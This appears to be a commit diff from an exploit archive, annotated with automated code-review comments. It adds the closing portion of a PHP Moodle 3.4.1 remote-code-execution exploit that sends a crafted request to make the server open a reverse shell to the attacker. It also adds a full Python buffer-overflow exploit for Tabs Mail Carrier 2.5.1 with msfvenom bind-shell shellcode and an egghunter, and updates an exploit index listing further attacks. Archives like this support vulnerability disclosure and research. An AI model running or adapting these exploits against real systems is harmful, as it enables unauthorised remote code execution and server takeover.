+ echo "\n\r";
+
+ if ($this->debug) {
+ echo "[D] Payload: \n\r";
+ echo sprintf("[>] %s \n\r", $this->payload);
+ }
+
+ $exploitUrl = sprintf(
+ "/question/question.php?returnurl=%s&addonpage=0&appendqnumstring=addquestion&scrollpos=0&id=8&wizardnow=datasetitems&cmid=%s&0=(%s)",
+ urlencode(sprintf(
+ "/mod/quiz/edit.php?cmid=%s",
+ $this->quizId)
+ ),
+ $this->quizId,
+ $this->payload);
+
+ if ($this->debug) {
+ echo sprintf("[D] Exploit URL: %s \n\r", $exploitUrl);
+ }
+
+ echo sprintf("[>] You should receive a reverse shell attempt from the target at %s on port %s \n\r", $this->ip, $this->port);
+ echo sprintf("[>] If connection was successful this program will wait here until you close the connection.\n\r");
+ echo sprintf("[>] You should be able to Ctrl+C and retain the connection through netcat.\n\r");
+ $this->httpGet($exploitUrl, $this->moodleSession);
+ }
+
+ function httpPost($url, $data, $session = false, $json = false)
+ {
+ if ($this->debug) {
+ echo(sprintf("[D] Doing HTTP POST to URL: %s \n\r", $url));
+ echo(sprintf("[D] Session: %s \n\r", $session));
+ echo(sprintf("[D] Data: %s \n\r", json_encode($data)));
+ echo("\n\r");
+ }
+
+ $curl = curl_init(sprintf("%s%s", $this->url, $url));
+
+ $headers = [];
+
+ if ($session) {
+ array_push($headers, sprintf("Cookie: MoodleSession=%s", $session));
+ }
+
+ if ($json) {
+ array_push($headers, "Content-Type: application/json");
+ } else {
+ $data = urldecode(http_build_query($data));
+ }
+
+ curl_setopt($curl, CURLOPT_POST, true);
+ curl_setopt($curl, CURLOPT_HTTPHEADER, $headers);
+ curl_setopt($curl, CURLOPT_POSTFIELDS, $data);
+ curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
+ curl_setopt($curl, CURLOPT_HEADER, true);
+ curl_setopt($curl, CURLOPT_COOKIEJAR, $this->cookie_jar);
+ curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
+ $response = curl_exec($curl);
+
+ $header_size = curl_getinfo($curl, CURLINFO_HEADER_SIZE);
+ $header = substr($response, 0, $header_size);
+ $body = substr($response, $header_size);
+
+ if ($this->debug) {
+ echo "[D] Response Header";
+ echo sprintf("[>] %s", $header);
+ echo "";
+ echo "[D] Response Body";
+ echo sprintf("[>] %s", $body);
+ }
+
+ return [
+ "header" => $header,
+ "body" => $body
+ ];
+ }
+
+ function httpGet($route, $session = false)
+ {
+ $url = sprintf("%s%s", $this->url, $route);
+
+ if ($this->debug) {
+ echo(sprintf("[D] Doing HTTP GET to URL: %s \n\r", $url));
+ echo("\n\r");
+ }
+
+ $headers = [];
+
+ if ($session) {
+ array_push($headers, sprintf("Cookie: MoodleSession=%s", $session));
+ }
+
+ $curl = curl_init($url);
+
+ curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
+ curl_setopt($curl, CURLOPT_HEADER, true);
+ curl_setopt($curl, CURLOPT_HTTPHEADER, $headers);
+ curl_setopt($curl, CURLOPT_COOKIEJAR, $this->cookie_jar);
+ curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
+ $response = curl_exec($curl);
+
+ $header_size = curl_getinfo($curl, CURLINFO_HEADER_SIZE);
+ $header = substr($response, 0, $header_size);
+ $body = substr($response, $header_size);
+
+ if ($this->debug) {
+ echo "[D] Response Header";
+ echo sprintf("[>] %s", $header);
+ echo "";
+ echo "[D] Response Body";
+ echo sprintf("[>] %s", $body);
+ }
+
+ return [
+ "header" => $header,
+ "body" => $body
+ ];
+ }
+ }
+
+ parse_str(implode("&", array_slice($argv, 1)), $_GET);
+
+ $url = $_GET["url"];
+ $user = $_GET["user"];
+ $pass = $_GET["pass"];
+ $ip = $_GET["ip"];
+ $port = $_GET["port"];
+ $course = $_GET["course"];
+ $debug = isset($_GET["debug"]) ? true : false;
+
+ new \exploit\moodle($url, $user, $pass, $ip, $port, $course, $debug);
+}
\ No newline at end of file
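Review bot: `login()` echoes the supplied password to the terminal on L460 (`[*] Logging in as user %s with password %s`), so the credential ends up in terminal scrollback and any captured output; drop it from the message, e.g. `echo(sprintf("[*] Logging in as user %s \n\r", $user));`. The cookie jar created with `tempnam()` on L426 is never removed, so the MoodleSession cookie file survives in /tmp after the run; add `unlink($this->cookie_jar);` before the `die()` on L456 and on the early-exit paths in `login()`, `loadCourse()`, `enableEdit()`, `addQuiz()`, `editQuiz()`, `addCalculatedQuestion()` and `addEvilQuestion()`. As rendered, the hunk begins mid-comment on L383 (the `<?php` tag and the opening of the doc block are not shown) and the header counts 512 lines where roughly 495 are visible, so the file's opening should be checked against the raw commit.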
diff --git a/exploits/windows/remote/46547.py b/exploits/windows/remote/46547.py
new file mode 100755
index 000000000..8f0a0cf40
--- /dev/null
+++ b/exploits/windows/remote/46547.py
@@ -0,0 +1,111 @@
+# Exploit Title: Tabs Mail Carrier 2.5.1 MAIL FROM: Buffer Overflow
+# Date: March 14, 2019
+# Exploit Author: Joseph McDonagh
+# Vendor Homepage: N/A
+# Software Link: N/A
+# Version: Mail Carrier 2.5.1
+# Tested on: Windows Vista Home Basic SP2
+# CVE: None
+
+
+#!/usr/bin/python
+#
+# This script started from PWK, Chapter 6
+# I am re-purposing it Tabs Mail Carrier 2.5.1 OSCE practice
+# During testing, I found the MAIL FROM: is also vulnerable to Buffer Overflow
+# Thanks to the original authors of the EHLO parameter, gave me the
+starting point and nudge I needed
+#
+# Usage ./tabs_mail.pwn.py 192.168.1.66
+# Bind shell on TCP port 19397
+# Tested on Windows Vista Home Basic SP 2
+
+import sys
+import socket
+import time
+
+if len(sys.argv) < 2:
+ print "[-]Usage: %s " % sys.argv[0]
+
+ sys.exit(0)
+
+ipaddr=sys.argv[1]
+port=25
+
+callebx="\xb1\x32\x9c\x0f"
+sled="\x90" * 8
+egg="T00WT00W"
+
+pay=egg
+
+#msfvenom -p windows/shell_bind_tcp LPORT=19397 -b='\x00' -e
+x86/shikata_ga_nai -f py | sed 's/buf/pay/g'
+#[-] No platform was selected, choosing Msf::Module::Platform::Windows
+from the payload
+#[-] No arch selected, selecting arch: x86 from the payload
+#Found 1 compatible encoders
+#Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
+#x86/shikata_ga_nai succeeded with size 355 (iteration=0)
+#x86/shikata_ga_nai chosen with final size 355
+#Payload size: 355 bytes
+#Final size of py file: 1710 bytes
+
+pay += "\xd9\xe9\xd9\x74\x24\xf4\x5a\x2b\xc9\xb1\x53\xbe\x8c"
+pay += "\x69\xbd\xa0\x31\x72\x17\x03\x72\x17\x83\x4e\x6d\x5f"
+pay += "\x55\xb2\x86\x1d\x96\x4a\x57\x42\x1e\xaf\x66\x42\x44"
+pay += "\xa4\xd9\x72\x0e\xe8\xd5\xf9\x42\x18\x6d\x8f\x4a\x2f"
+pay += "\xc6\x3a\xad\x1e\xd7\x17\x8d\x01\x5b\x6a\xc2\xe1\x62"
+pay += "\xa5\x17\xe0\xa3\xd8\xda\xb0\x7c\x96\x49\x24\x08\xe2"
+pay += "\x51\xcf\x42\xe2\xd1\x2c\x12\x05\xf3\xe3\x28\x5c\xd3"
+pay += "\x02\xfc\xd4\x5a\x1c\xe1\xd1\x15\x97\xd1\xae\xa7\x71"
+pay += "\x28\x4e\x0b\xbc\x84\xbd\x55\xf9\x23\x5e\x20\xf3\x57"
+pay += "\xe3\x33\xc0\x2a\x3f\xb1\xd2\x8d\xb4\x61\x3e\x2f\x18"
+pay += "\xf7\xb5\x23\xd5\x73\x91\x27\xe8\x50\xaa\x5c\x61\x57"
+pay += "\x7c\xd5\x31\x7c\x58\xbd\xe2\x1d\xf9\x1b\x44\x21\x19"
+pay += "\xc4\x39\x87\x52\xe9\x2e\xba\x39\x66\x82\xf7\xc1\x76"
+pay += "\x8c\x80\xb2\x44\x13\x3b\x5c\xe5\xdc\xe5\x9b\x0a\xf7"
+pay += "\x52\x33\xf5\xf8\xa2\x1a\x32\xac\xf2\x34\x93\xcd\x98"
+pay += "\xc4\x1c\x18\x34\xcc\xbb\xf3\x2b\x31\x7b\xa4\xeb\x99"
+pay += "\x14\xae\xe3\xc6\x05\xd1\x29\x6f\xad\x2c\xd2\xc4\xeb"
+pay += "\xb8\x34\xb0\xe3\xec\xef\x2c\xc6\xca\x27\xcb\x39\x39"
+pay += "\x10\x7b\x71\x2b\xa7\x84\x82\x79\x8f\x12\x09\x6e\x0b"
+pay += "\x03\x0e\xbb\x3b\x54\x99\x31\xaa\x17\x3b\x45\xe7\xcf"
+pay += "\xd8\xd4\x6c\x0f\x96\xc4\x3a\x58\xff\x3b\x33\x0c\xed"
+pay += "\x62\xed\x32\xec\xf3\xd6\xf6\x2b\xc0\xd9\xf7\xbe\x7c"
+pay += "\xfe\xe7\x06\x7c\xba\x53\xd7\x2b\x14\x0d\x91\x85\xd6"
+pay += "\xe7\x4b\x79\xb1\x6f\x0d\xb1\x02\xe9\x12\x9c\xf4\x15"
+pay += "\xa2\x49\x41\x2a\x0b\x1e\x45\x53\x71\xbe\xaa\x8e\x31"
+pay += "\xce\xe0\x92\x10\x47\xad\x47\x21\x0a\x4e\xb2\x66\x33"
+pay += "\xcd\x36\x17\xc0\xcd\x33\x12\x8c\x49\xa8\x6e\x9d\x3f"
+pay += "\xce\xdd\x9e\x15"
+
+egghunter="\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x54\x30\x30\x57\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
+
+# Build the Buffer
+buffer="A" * 700 # 5088 to EIP
+buffer+=pay
+buffer+="B" * (5088 - (700 + len(pay)))
+buffer+=callebx # Overwrite EIP with Call EBX in c:\Windows\System32\expsrv.dll
+buffer+=sled # 5100 bytes mark
+buffer+="C" * 516 # This put us at the EBX register
+buffer+=sled # NOPS
+buffer+=egghunter
+buffer+="D" * (5900 - len(buffer)) # Padding
+
+try:
+ print "[-] Attacking Tab MailC Carrier MAIL FROM: with %s bytes" %len(buffer)
+ s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+ connect=s.connect ((ipaddr, port)) # Connect to IP & SMTP port
+ s.recv(1024) # receive banner
+ s.send('EHLO root@localhost \r\n') # send EHLO
+ s.recv(1024) # receive reply
+ s.send('MAIL FROM: ' + buffer + '\r\n') # Send the phony Mail From
+ s.recv(1024)
+ s.send('RCPT TO: evelyn@evelyn \r\n')
+ s.send('QUIT\r\n')
+ s.close()
+ time.sleep(1)
+ print "[-] Done!"
+except:
+ print "[-] Could not connect to target"
+ exit()
\ No newline at end of file
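Review bot: The bare `except:` at the end of the `try` block reports every failure as "Could not connect to target", including a connection reset during `send` or a Ctrl-C while blocked in `recv`, so the message is frequently wrong and the real exception is discarded; narrow it and surface the error, `except socket.error as e:` followed by `print "[-] Could not connect to target: %s" % e`. Separately, the `#!/usr/bin/python` line sits after the header comment block, so it is not an effective shebang; either move it to line 1 or drop it. The lines `starting point and nudge I needed`, `x86/shikata_ga_nai -f py | sed 's/buf/pay/g'` and `from the payload` carry no leading `#`; if that wrapping is present in the file itself rather than an artifact of the listing, the module fails with a SyntaxError before anything runs, so those comment lines should be re-joined or prefixed.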
diff --git a/files_exploits.csv b/files_exploits.csv
index bc3231bb3..59ba5898f 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -17253,6 +17253,7 @@ id,file,description,date,author,type,platform,port
46540,exploits/windows/remote/46540.py,"Apache Tika-server < 1.18 - Command Injection",2019-03-13,"Rhino Security Labs",remote,windows,
46543,exploits/windows/remote/46543.py,"FTPGetter Standard 5.97.0.177 - Remote Code Execution",2019-03-14,w4fz5uck5,remote,windows,
46544,exploits/multiple/remote/46544.py,"Apache UNO / LibreOffice Version: 6.1.2 / OpenOffice 4.1.6 API - Remote Code Execution",2019-03-14,sud0woodo,remote,multiple,
+46547,exploits/windows/remote/46547.py,"Mail Carrier 2.5.1 - 'MAIL FROM' Buffer Overflow",2019-03-15,"Joseph McDonagh",remote,windows,25
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -40987,3 +40988,9 @@ id,file,description,date,author,type,platform,port
46538,exploits/php/webapps/46538.txt,"pfSense 2.4.4-p1 (HAProxy Package 0.59_14) - Persistent Cross-Site Scripting",2019-03-13,"Gionathan Reale",webapps,php,443
46541,exploits/php/webapps/46541.html,"Intel Modular Server System 10.18 - Cross-Site Request Forgery (Change Admin Password)",2019-03-14,LiquidWorm,webapps,php,
46542,exploits/php/webapps/46542.py,"Pegasus CMS 1.0 - 'extra_fields.php' Plugin Remote Code Execution",2019-03-14,R3zk0n,webapps,php,80
+46545,exploits/multiple/webapps/46545.txt,"NetData 1.13.0 - HTML Injection",2019-03-15,s4vitar,webapps,multiple,
+46546,exploits/php/webapps/46546.py,"CMS Made Simple Showtime2 Module 3.6.2 - Authenticated Arbitrary File Upload",2019-03-15,"Daniele Scanu",webapps,php,80
+46548,exploits/php/webapps/46548.txt,"ICE HRM 23.0 - Multiple Vulnerabilities",2019-03-15,"Mehmet EMIROGLU",webapps,php,80
+46549,exploits/php/webapps/46549.txt,"Vembu Storegrid Web Interface 4.4.0 - Multiple Vulnerabilities",2019-03-15,"Gionathan Reale",webapps,php,80
+46550,exploits/php/webapps/46550.txt,"Laundry CMS - Multiple Vulnerabilities",2019-03-15,"Mehmet EMIROGLU",webapps,php,80
+46551,exploits/php/webapps/46551.php,"Moodle 3.4.1 - Remote Code Execution",2019-03-15,"Darryn Ten",webapps,php,80